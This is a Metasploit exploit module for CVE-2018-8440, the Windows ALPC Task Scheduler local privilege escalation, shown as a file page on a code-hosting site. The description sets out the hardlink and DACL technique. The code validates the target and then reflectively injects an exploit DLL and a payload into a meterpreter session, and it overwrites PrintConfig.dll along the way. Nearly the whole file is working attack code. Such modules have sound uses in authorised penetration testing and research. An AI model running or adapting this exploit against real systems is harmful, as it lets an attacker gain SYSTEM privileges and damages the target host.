adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/modules/exploits/windows/local/alpc_taskscheduler.rb
T
Ashley Donaldson 75ba9110e2 Added module for Windows version comparisons 
Utilised it in various existing modules - this should fix some subtle bugs in specific modules' version detection.
2023-05-25 14:36:46 +10:00

107 lines
3.5 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Microsoft Windows ALPC Task Scheduler Local Privilege Elevation',
'Description' => %q{
On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented
by the task scheduler service can be used to write arbitrary DACLs to `.job` files located
in `c:\windows\tasks` because the scheduler does not use impersonation when checking this
location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be
created to a file the user has read access to. After creating a hardlink, the vulnerability
can be triggered to set the DACL on the linked file.
WARNING:
The PrintConfig.dll (%windir%\system32\driverstor\filerepository\prnms003*) on the target host
will be overwritten when the exploit runs.
This module has been tested against Windows 10 Pro x64.
},
'License' => MSF_LICENSE,
'Author' => [
'SandboxEscaper', # Original discovery and PoC
'bwatters-r7', # msf module
'asoto-r7', # msf module
'Jacob Robles' # msf module
],
'Platform' => 'win',
'SessionTypes' => ['meterpreter'],
'Targets' => [
['Windows 10 x64', { 'Arch' => ARCH_X64 }]
],
'References' => [
['CVE', '2018-8440'],
['URL', 'https://github.com/SandboxEscaper/randomrepo/'],
],
'Notes' => {
# Exploit overwrites PrintConfig.dll, which makes it unusable.
'Stability' => [ OS_RESOURCE_LOSS ],
'Reliability' => [ REPEATABLE_SESSION ]
},
'DisclosureDate' => '2018-08-27',
'DefaultTarget' => 0
)
)
end
def validate_active_host
sysinfo['Computer']
true
rescue Rex::Post::Meterpreter::RequestError, Rex::TimeoutError => e
elog(e)
false
end
def validate_target
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if sysinfo['Architecture'] == ARCH_X86
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
end
version = get_version_info
if version.xp_or_2003? && version.workstation?
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
end
end
def exploit
unless session.type == 'meterpreter'
fail_with(Failure::None, 'Only meterpreter sessions are supported')
end
print_status('Checking target...')
unless validate_active_host
raise Msf::Exploit::Failed, 'Could not connect to session'
end
validate_target
print_status('Target looks good... attempting the LPE exploit')
execute_dll(
::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll'),
generate_payload_dll
)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
rescue Rex::Post::Meterpreter::RequestError => e
elog(e)
print_error(e.message)
end
end
Reference in New Issue View Git Blame Copy Permalink